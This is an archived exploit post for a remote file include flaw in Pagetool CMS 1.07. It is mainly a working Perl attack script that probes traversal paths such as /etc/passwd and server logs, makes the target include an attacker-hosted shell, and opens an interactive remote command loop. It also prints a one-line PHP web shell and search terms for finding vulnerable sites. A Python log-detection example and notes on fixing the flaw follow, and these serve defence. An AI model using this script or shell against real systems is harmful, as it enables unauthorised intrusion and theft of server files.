Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
Source: www.g00ns.net  Author: TrinTiTTy  Published: 2006-12-25

#!/usr/bin/perl
use LWP::UserAgent;
####################################################################
# ___ ___ _
# / _ \ / _ \ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|
# __/ |
# |___/
#
#===========================INFO====================================
# Impact level: HIGH
#
# Google: powered by pagetool or Pagetool Development Team
#
# browser use:
# http://[ site ]/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
#
#=========================VULN CODE=================================
# Code:
#
# if (file_exists($config_file))
#{
# include($config_file);
#
# ...
# include($ptconf["src"] . "pagetool/pt_profile.inc");
# include($ptconf["src"] . "pagetool/pt_functions.inc");
#===================================================================
#
# Vulnerability Found by: FiSh and godXcel
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#---Exploit---#
#==========================================================#
# [Pagetool CMS <=1.07 (RFI)]
# [c]oded by TrinTiTTy -at- g00ns.net
#==========================================================#
#
# ! Vulnerability by FiSh and godXcel !
#
# Shoutz: z3r0, clorox, wicked, synical, ReZEN, grumpy,
# SiCK, and everyone else at g00ns.net
#
# greetz: 13337.org, acircle.us
#
# www.g00ns.net | irc.g00ns.net #g00ns | www.g00ns-forum.net
#
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# # Notes: #
# # Shell example <?passthru($_GET[cmd]);?> #
# # Shell variable: ($_GET[cmd]); #
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#==========================================================#

$host = $ARGV[0]; $shell = $ARGV[1];

if ($host =~ /http:\/\// || $shell =~ /http:\/\//)
{print "\n\n [-] Don't include http:// in your links!\n";usage();exit();}
elsif (@ARGV != 2) {head();usage();exit();}
head();
print "\n [!] Scanning for local server config file\n\n [!] Be patient...\n";

# No credz to me for below list..
@cfgs = ("/etc/passwd",
"../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../apache/logs/access.log",
"../../../../../var/log/httpd/error_log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log");
scan();
sub scan(){
for ($i = 0; $i <=40; ++$i){
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?";
$response = $ag3nt->get($inc);
syswrite STDOUT,".";
$ans = $response->content;
if( $ans =~ /500 Server closed connection without sending any data back/)
{print "\n\n [-] Couldn't Include Shell...better luck next time.\n\n";exit;}
elsif ($ans =~ /Cannot execute a blank command/)
{print "\n [+] Server File: FOUND\n\n [+] Executing Command Shell...\n\nType quit to exit shell\n";commands();}}}
print "\n\n [-] Couldn't find valid config file...better luck next time\n\n";exit;

sub commands(){
print "\nshell\@box \$~ ";
$nix=<STDIN>;
chomp($nix);
if ($nix =~ /quit/gmi){print "\n [-] Good Bye\n";exit();}
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?cmd=".$nix.'%00';
$response = $ag3nt->get($inc);
$ans = $response->content;
if ($ans =~ /<b>Warning<\/b>:/gmi || $ans =~ /<a href=/gmi)
{print " \n[-] ERROR: Bad command, permissions, website, or shell.\n";commands();}
else {print "\n$ans";commands();}}

sub head(){
print q {
|======================================================|
| Pagetool CMS <=1.07 (RFI) |
| [c]oded by TrinTiTTy -at- g00ns.net |
| -----------------------------------------------------|
| |
| Vulnerability by FiSh and godXcel |
| greetz: 13337.org, acircle.us |
| |
| www.g00ns.net |
|======================================================|
}}
sub usage(){
print q{
Usage: perl pagetool07.pl <host> <shell location>

Example: perl pagetool07.pl www.victim.net www.shellsite.com/shell.txt
}
}
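The header above shows the root cause: pt_upload.php passes the request-controlled config_file straight into include(), and then includes $ptconf["src"] . "pagetool/pt_profile.inc", so an attacker-supplied URL in ptconf[src] becomes a remote include. The following detection logic is an added example (not from the page or the Pagetool project) that scans constructed Apache combined-format log lines for the request shape the script above generates: pt_upload.php with a traversal or absolute path in config_file, a remote scheme in ptconf[src], or a null byte in the query string. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (not taken from any real server or from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Dec/2006:10:01:02 +0000] "GET /src/admin/pt_upload.php?config_file=../../../../../var/log/apache/error_log&ptconf[src]=http://198.51.100.7/shell.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [25/Dec/2006:10:01:09 +0000] "GET /src/admin/pt_upload.php?config_file=/etc/passwd&ptconf[src]=http://198.51.100.7/shell.txt?cmd=id%00 HTTP/1.1" 200 980 "-" "libwww-perl/5.805"
192.0.2.44 - - [25/Dec/2006:10:02:30 +0000] "GET /src/admin/pt_upload.php?config_file=pt_config.inc HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
192.0.2.45 - - [25/Dec/2006:10:03:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def inspect_request(target):
    """Return the list of LFI/RFI indicators found in one request target; empty if clean."""
    parts = urlsplit(target)
    if not parts.path.endswith("/pt_upload.php"):
        return []
    # parse_qs already percent-decodes keys and values; keep blank values so a
    # trailing '?' in the ptconf[src] URL does not drop the parameter.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for value in params.get("config_file", []):
        if value.startswith("/") or "../" in value or "\x00" in value:
            findings.append("config_file traversal/absolute path: " + value)
    for value in params.get("ptconf[src]", []):
        if REMOTE_SCHEME.match(value):
            findings.append("remote ptconf[src]: " + value)
    if "\x00" in unquote(parts.query):
        findings.append("null byte in query string")
    return findings

def scan_log(text):
    """Return a list of (ip, timestamp, findings) for each line that triggers an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), findings))
    return hits

if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, "; ".join(findings))
```

The same inspect_request() check can be applied at the web server or WAF layer; on the application side the durable fix is an allow-list for config_file, a fixed local path for ptconf[src], and allow_url_include=Off.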
